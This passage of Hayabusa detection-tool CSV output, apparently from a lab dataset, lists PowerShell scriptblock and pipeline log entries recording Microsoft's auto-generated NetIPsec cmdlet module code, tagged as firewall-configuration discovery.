[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') 
-contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecIdentity ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 
'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): 
name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Get-NetIPsecMainModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeSA 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
